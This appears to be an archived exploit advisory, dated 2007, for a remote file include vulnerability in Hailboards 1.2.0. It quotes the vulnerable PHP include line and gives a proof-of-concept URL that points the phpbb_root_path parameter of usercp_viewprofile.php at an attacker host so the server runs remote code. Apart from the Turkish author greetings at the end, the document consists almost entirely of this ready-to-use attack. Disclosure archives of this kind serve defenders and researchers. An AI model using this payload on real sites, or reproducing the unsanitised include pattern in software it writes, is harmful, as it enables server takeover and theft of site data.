id: 1453
date: 01/31/2007
title: Hailboards 1.2.0 (phpbb_root_path) Remote File Include Vulnerability
author: xoron
cves: 

====================================================================
Hailboards 1.2.0 (phpbb_root_path) Remote File Include Vulnerability
====================================================================



-----------------------------------------------

Hailboards v1.2.0 (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

-----------------------------------------------

Code:

include($phpbb_root_path . 'includes/bbcode.'.$phpEx);

-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/usercp_viewprofile.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

download: http://hailboards.org/

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------



#  0day.today [2023-03-25]  #